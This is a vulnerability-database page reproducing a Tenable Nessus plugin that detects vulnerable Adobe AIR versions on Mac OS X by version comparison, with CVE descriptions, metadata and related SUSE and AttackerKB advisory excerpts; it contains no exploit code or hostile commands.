Search...

Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)

2015-06-12T00:00:00

ID MACOSX_ADOBE_AIR_APSB15-06.NASL
Type nessus
Reporter This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified 2021-01-02T00:00:00

Description

According to its version, the installation of Adobe AIR on the remote Mac OS X host is equal or prior to 17.0.0.144. It is, therefore, affected by multiple vulnerabilities :

Multiple double-free errors exist that allow an attacker to execute arbitrary code. (CVE-2015-0346, CVE-2015-0359)

Multiple memory corruption flaws exist due to improper validation of user-supplied input. A remote attacker can exploit these flaws, via specially crafted flash content, to corrupt memory and execute arbitrary code. (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043)

A unspecified buffer overflow condition exists due to improper validation of user-supplied input. A remote attacker can exploit this to execute arbitrary code. (CVE-2015-0348)

Multiple unspecified use-after-free errors exist that allow an attacker to execute arbitrary code. (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039)

An unspecified type confusion flaw exists that allows an attacker to execute arbitrary code. (CVE-2015-0356)

Multiple unspecified memory leaks exist that allows an attacker to bypass the Address Space Layout Randomization (ASLR) feature. (CVE-2015-0357, CVE-2015-3040)

An unspecified security bypass flaw exists that allows an attacker to disclose information. (CVE-2015-3044)

                                        
                                            #
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(84160);
  script_version("1.9");
  script_cvs_date("Date: 2019/11/22");

  script_cve_id(
    "CVE-2015-0346",
    "CVE-2015-0347",
    "CVE-2015-0348",
    "CVE-2015-0349",
    "CVE-2015-0350",
    "CVE-2015-0351",
    "CVE-2015-0352",
    "CVE-2015-0353",
    "CVE-2015-0354",
    "CVE-2015-0355",
    "CVE-2015-0356",
    "CVE-2015-0357",
    "CVE-2015-0358",
    "CVE-2015-0359",
    "CVE-2015-0360",
    "CVE-2015-3038",
    "CVE-2015-3039",
    "CVE-2015-3040",
    "CVE-2015-3041",
    "CVE-2015-3042",
    "CVE-2015-3043",
    "CVE-2015-3044"
  );
  script_bugtraq_id(
    74062,
    74064,
    74065,
    74066,
    74067,
    74068,
    74069
  );

  script_name(english:"Adobe AIR for Mac &lt;= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)");
  script_summary(english:"Checks the version gathered by local check.");

  script_set_attribute(attribute:"synopsis", value:
"The remote Mac OS X host has a version of Adobe AIR installed that is
affected by multiple vulnerabilities.");
  script_set_attribute(attribute:"description", value:
"According to its version, the installation of Adobe AIR on the remote
Mac OS X host is equal or prior to 17.0.0.144. It is, therefore,
affected by multiple vulnerabilities :

  - Multiple double-free errors exist that allow an attacker
    to execute arbitrary code. (CVE-2015-0346,
    CVE-2015-0359)

  - Multiple memory corruption flaws exist due to improper
    validation of user-supplied input. A remote attacker can
    exploit these flaws, via specially crafted flash
    content, to corrupt memory and execute arbitrary code.
    (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,
    CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,
    CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,
    CVE-2015-3042, CVE-2015-3043)

  - A unspecified buffer overflow condition exists due to
    improper validation of user-supplied input. A remote
    attacker can exploit this to execute arbitrary code.
    (CVE-2015-0348)

  - Multiple unspecified use-after-free errors exist that
    allow an attacker to execute arbitrary code.
    (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,
    CVE-2015-3039)

  - An unspecified type confusion flaw exists that allows
    an attacker to execute arbitrary code. (CVE-2015-0356)

  - Multiple unspecified memory leaks exist that allows an
    attacker to bypass the Address Space Layout
    Randomization (ASLR) feature. (CVE-2015-0357,
    CVE-2015-3040)

  - An unspecified security bypass flaw exists that allows
    an attacker to disclose information. (CVE-2015-3044)");
  script_set_attribute(attribute:"see_also", value:"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html");
  # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?0cb17c10");
  script_set_attribute(attribute:"solution", value:
"Upgrade to Adobe AIR 17.0.0.172 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-3043");

  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploit_framework_core", value:"true");
  script_set_attribute(attribute:"exploited_by_malware", value:"true");
  script_set_attribute(attribute:"metasploit_name", value:'Adobe Flash Player domainMemory ByteArray Use After Free');
  script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2015/04/14");
  script_set_attribute(attribute:"patch_publication_date", value:"2015/04/14");
  script_set_attribute(attribute:"plugin_publication_date", value:"2015/06/12");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:adobe:air");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_family(english:"MacOS X Local Security Checks");

  script_copyright(english:"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  script_dependencies("macosx_adobe_air_installed.nasl");
  script_require_keys("MacOSX/Adobe_AIR/Version");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");

kb_base = "MacOSX/Adobe_AIR";
version = get_kb_item_or_exit(kb_base+"/Version");
path = get_kb_item_or_exit(kb_base+"/Path");

# nb: we're checking for versions less than *or equal to* the cutoff!
cutoff_version = '17.0.0.144';
fixed_version_for_report = '17.0.0.172';

if (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) &lt;= 0)
{
  if (report_verbosity &gt; 0)
  {
    report =
      '\n  Path              : ' + path +
      '\n  Installed version : ' + version +
      '\n  Fixed version     : ' + fixed_version_for_report +
      '\n';
    security_hole(port:0, extra:report);
  }
  else security_hole(0);
  exit(0);
}
else audit(AUDIT_INST_PATH_NOT_VULN, "Adobe AIR", version, path);

JSON Vulners Source

Initial Source

{"id": "MACOSX_ADOBE_AIR_APSB15-06.NASL", "bulletinFamily": "scanner", "title": "Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)", "description": "According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)", "published": "2015-06-12T00:00:00", "modified": "2021-01-02T00:00:00", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/84160", "reporter": "This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.", "references": ["https://helpx.adobe.com/security/products/flash-player/apsb15-06.html", "http://www.nessus.org/u?0cb17c10"], "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "type": "nessus", "lastseen": "2021-01-01T03:26:52", "edition": 26, "viewCount": 2, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:FC7F82AC-EFD4-4E11-A682-CABB2E084D5A"]}, {"type": "nessus", "idList": ["SUSE_11_FLASH-PLAYER-150415.NASL", "REDHAT-RHSA-2015-0813.NASL", "MACOSX_FLASH_PLAYER_APSA15-06.NASL", "OPENSUSE-2015-304.NASL", "FREEBSD_PKG_3364D497E4E611E4A265C485083CA99C.NASL", "GENTOO_GLSA-201504-07.NASL", "ADOBE_AIR_APSB15-06.NASL", "GOOGLE_CHROME_42_0_2311_152.NASL", "SMB_KB3049508.NASL", "FLASH_PLAYER_APSB15-06.NASL"]}, {"type": "suse", "idList": ["SUSE-SU-2015:0878-1", "OPENSUSE-SU-2015:0890-1", "OPENSUSE-SU-2015:0914-1", "SUSE-SU-2015:0722-1", "SUSE-SU-2015:0723-1", "OPENSUSE-SU-2015:0718-1", "OPENSUSE-SU-2015:0725-1"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310805465", "OPENVAS:1361412562310121376", "OPENVAS:1361412562310121374", "OPENVAS:1361412562310851099", "OPENVAS:1361412562310805464", "OPENVAS:1361412562310850878", "OPENVAS:1361412562310805466", "OPENVAS:1361412562310851029"]}, {"type": "kaspersky", "idList": ["KLA10547", "KLA10574", "KLA10576"]}, {"type": "gentoo", "idList": ["GLSA-201504-07", "GLSA-201505-02"]}, {"type": "archlinux", "idList": ["ASA-201504-18"]}, {"type": "freebsd", "idList": ["3364D497-E4E6-11E4-A265-C485083CA99C", "E206DF57-F97B-11E4-B799-C485083CA99C"]}, {"type": "redhat", "idList": ["RHSA-2015:0813"]}, {"type": "cve", "idList": ["CVE-2015-0350", "CVE-2015-3039", "CVE-2015-3041", "CVE-2015-3040", "CVE-2015-0346", "CVE-2015-0351", "CVE-2015-3038", "CVE-2015-3043", "CVE-2015-0359", "CVE-2015-3042"]}, {"type": "zdi", "idList": ["ZDI-15-134", "ZDI-15-293", "ZDI-15-133"]}, {"type": "exploitdb", "idList": ["EDB-ID:37839", "EDB-ID:37536", "EDB-ID:36956"]}, {"type": "zdt", "idList": ["1337DAY-ID-24086", "1337DAY-ID-23606", "1337DAY-ID-23847"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:D8E6122E0C3ED28050822787A838C525"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:131825", "PACKETSTORM:132525"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_NELLYMOSER_BOF/", "MSF:EXPLOIT/MULTI/BROWSER/ADOBE_FLASH_NELLYMOSER_BOF", "MSF:EXPLOIT/WINDOWS/BROWSER/ADOBE_FLASH_DOMAIN_MEMORY_UAF"]}, {"type": "hackerone", "idList": ["H1:63324", "H1:73276", "H1:56385"]}, {"type": "thn", "idList": ["THN:B74D1710436E41A0246F2D91A101DF62"]}, {"type": "threatpost", "idList": ["THREATPOST:F5AE68DD67373F4022C1BBC1B5C2DDB3", "THREATPOST:0FAFED5DB78FA64CCE60EB40BB4C8915"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:58B8640C3716E8B2D608FF8EDD780806"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:14490"]}], "modified": "2021-01-01T03:26:52", "rev": 2}, "score": {"value": 10.2, "vector": "NONE", "modified": "2021-01-01T03:26:52", "rev": 2}, "vulnersScore": 10.2}, "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(84160);\n script_version(\"1.9\");\n script_cvs_date(\"Date: 2019/11/22\");\n\n script_cve_id(\n \"CVE-2015-0346\",\n \"CVE-2015-0347\",\n \"CVE-2015-0348\",\n \"CVE-2015-0349\",\n \"CVE-2015-0350\",\n \"CVE-2015-0351\",\n \"CVE-2015-0352\",\n \"CVE-2015-0353\",\n \"CVE-2015-0354\",\n \"CVE-2015-0355\",\n \"CVE-2015-0356\",\n \"CVE-2015-0357\",\n \"CVE-2015-0358\",\n \"CVE-2015-0359\",\n \"CVE-2015-0360\",\n \"CVE-2015-3038\",\n \"CVE-2015-3039\",\n \"CVE-2015-3040\",\n \"CVE-2015-3041\",\n \"CVE-2015-3042\",\n \"CVE-2015-3043\",\n \"CVE-2015-3044\"\n );\n script_bugtraq_id(\n 74062,\n 74064,\n 74065,\n 74066,\n 74067,\n 74068,\n 74069\n );\n\n script_name(english:\"Adobe AIR for Mac <= 17.0.0.144 Multiple Vulnerabilities (APSB15-06)\");\n script_summary(english:\"Checks the version gathered by local check.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Mac OS X host has a version of Adobe AIR installed that is\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its version, the installation of Adobe AIR on the remote\nMac OS X host is equal or prior to 17.0.0.144. It is, therefore,\naffected by multiple vulnerabilities :\n\n - Multiple double-free errors exist that allow an attacker\n to execute arbitrary code. (CVE-2015-0346,\n CVE-2015-0359)\n\n - Multiple memory corruption flaws exist due to improper\n validation of user-supplied input. A remote attacker can\n exploit these flaws, via specially crafted flash\n content, to corrupt memory and execute arbitrary code.\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355,\n CVE-2015-0360, CVE-2015-3038, CVE-2015-3041,\n CVE-2015-3042, CVE-2015-3043)\n\n - A unspecified buffer overflow condition exists due to\n improper validation of user-supplied input. A remote\n attacker can exploit this to execute arbitrary code.\n (CVE-2015-0348)\n\n - Multiple unspecified use-after-free errors exist that\n allow an attacker to execute arbitrary code.\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039)\n\n - An unspecified type confusion flaw exists that allows\n an attacker to execute arbitrary code. (CVE-2015-0356)\n\n - Multiple unspecified memory leaks exist that allows an\n attacker to bypass the Address Space Layout\n Randomization (ASLR) feature. (CVE-2015-0357,\n CVE-2015-3040)\n\n - An unspecified security bypass flaw exists that allows\n an attacker to disclose information. (CVE-2015-3044)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://helpx.adobe.com/security/products/flash-player/apsb15-06.html\");\n # http://helpx.adobe.com/flash-player/kb/archived-flash-player-versions.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0cb17c10\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Adobe AIR 17.0.0.172 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3043\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Flash Player domainMemory ByteArray Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:adobe:air\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_adobe_air_installed.nasl\");\n script_require_keys(\"MacOSX/Adobe_AIR/Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nkb_base = \"MacOSX/Adobe_AIR\";\nversion = get_kb_item_or_exit(kb_base+\"/Version\");\npath = get_kb_item_or_exit(kb_base+\"/Path\");\n\n# nb: we're checking for versions less than *or equal to* the cutoff!\ncutoff_version = '17.0.0.144';\nfixed_version_for_report = '17.0.0.172';\n\nif (ver_compare(ver:version, fix:cutoff_version, strict:FALSE) <= 0)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Path : ' + path +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_version_for_report +\n '\\n';\n security_hole(port:0, extra:report);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_PATH_NOT_VULN, \"Adobe AIR\", version, path);\n", "naslFamily": "MacOS X Local Security Checks", "pluginID": "84160", "cpe": ["cpe:/a:adobe:air"], "scheme": null}

{"attackerkb": [{"lastseen": "2020-11-23T18:08:39", "bulletinFamily": "info", "cvelist": ["CVE-2015-0347", "CVE-2015-0350", "CVE-2015-0352", "CVE-2015-0353", "CVE-2015-0354", "CVE-2015-0355", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-3041", "CVE-2015-3042", "CVE-2015-3043"], "description": "Adobe Flash Player before 13.0.0.281 and 14.x through 17.x before 17.0.0.169 on Windows and OS X and before 11.2.202.457 on Linux allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, as exploited in the wild in April 2015, a different vulnerability than CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038, CVE-2015-3041, and CVE-2015-3042.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at November 23, 2020 6:03pm UTC reported:\n\nReported as exploited in the wild as part of Google\u2019s 2020 0day vulnerability spreadsheet they made available at <https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit#gid=1869060786>. Original tweet announcing this spreadsheet with the 2020 findings can be found at <https://twitter.com/maddiestone/status/1329837665378725888>\n", "modified": "2020-07-30T00:00:00", "published": "2015-04-14T00:00:00", "id": "AKB:FC7F82AC-EFD4-4E11-A682-CABB2E084D5A", "href": "https://attackerkb.com/topics/mFVIlXM7D2/cve-2015-3043", "type": "attackerkb", "title": "CVE-2015-3043", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "suse": [{"lastseen": "2016-09-04T11:40:22", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044).\n\n", "edition": 1, "modified": "2015-04-15T13:05:12", "published": "2015-04-15T13:05:12", "id": "SUSE-SU-2015:0722-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00011.html", "type": "suse", "title": "Security update for Adobe Flash Player (important)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:56:25", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "Adobe Flash Player was updated to 11.2.202.457 to fix several security\n issues that could lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities were fixed:\n\n * Memory corruption vulnerabilities that could lead to code execution\n (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352, CVE-2015-0353,\n CVE-2015-0354, CVE-2015-0355, CVE-2015-0360, CVE-2015-3038,\n CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could lead to code execution\n (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358, CVE-2015-3039).\n * Double-free vulnerabilities that could lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could be used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could lead to information disclosure\n (CVE-2015-3044).\n\n", "edition": 1, "modified": "2015-04-15T10:04:46", "published": "2015-04-15T10:04:46", "id": "OPENSUSE-SU-2015:0718-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2015-04/msg00010.html", "title": "Security update for Adobe Flash Player (important)", "type": "suse", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:50:17", "bulletinFamily": "unix", "cvelist": ["CVE-2015-0355", "CVE-2015-0346", "CVE-2015-0358", "CVE-2015-0351", "CVE-2015-0357", "CVE-2015-0348", "CVE-2015-0353", "CVE-2015-3041", "CVE-2015-0350", "CVE-2015-3040", "CVE-2015-0349", "CVE-2015-0352", "CVE-2015-3044", "CVE-2015-0347", "CVE-2015-0354", "CVE-2015-3039", "CVE-2015-0360", "CVE-2015-3038", "CVE-2015-0359", "CVE-2015-0356", "CVE-2015-3043", "CVE-2015-3042"], "description": "Adobe Flash Player was updated to version 11.2.202.457 to fix several\n security issues that could have lead to remote code execution.\n\n An exploit for CVE-2015-3043 was reported to exist in the wild.\n\n The following vulnerabilities have been fixed:\n\n * Memory corruption vulnerabilities that could have lead to code\n execution (CVE-2015-0347, CVE-2015-0350, CVE-2015-0352,\n CVE-2015-0353, CVE-2015-0354, CVE-2015-0355, CVE-2015-0360,\n CVE-2015-3038, CVE-2015-3041, CVE-2015-3042, CVE-2015-3043).\n * Type confusion vulnerability that could have lead to code execution\n (CVE-2015-0356).\n * Buffer overflow vulnerability that could have lead to code execution\n (CVE-2015-0348).\n * Use-after-free vulnerabilities that could have lead to code\n execution (CVE-2015-0349, CVE-2015-0351, CVE-2015-0358,\n CVE-2015-3039).\n * Double-free vulnerabilities that could have lead to code execution\n (CVE-2015-0346, CVE-2015-0359).\n * Memory leak vulnerabilities that could have been used to bypass ASLR\n (CVE-2015-0357, CVE-2015-3040).\n * Security bypass vulnerability that could have lead to information\n disclosure (CVE-2015-3044).\n\n Security Issues:\n\n * CVE-2015-0346\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0346</a>>\n * CVE-2015-0347\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0347</a>>\n * CVE-2015-0348\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0348</a>>\n * CVE-2015-0349\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0349</a>>\n * CVE-2015-0350\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0350</a>>\n * CVE-2015-0351\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0351</a>>\n * CVE-2015-0352\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0352</a>>\n * CVE-2015-0353\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0353</a>>\n * CVE-2015-0354\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0354</a>>\n * CVE-2015-0355\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0355</a>>\n * CVE-2015-0356\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0356</a>>\n * CVE-2015-0357\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0357</a>>\n * CVE-2015-0358\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0358</a>>\n * CVE-2015-0359\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0359</a>>\n * CVE-2015-0360\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0360</a>>\n * CVE-2015-3038\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3038</a>>\n * CVE-2015-3039\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3039</a>>\n * CVE-2015-3040\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3040</a>>\n * CVE-2015-3041\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3041</a>>\n * CVE-2015-3042\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3042</a>>\n * CVE-2015-3043\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3043</a>>\n * CVE-2015-3044\n <<a rel=\"nofollow\" href=\"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044\">http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3044</a>>\n\n", 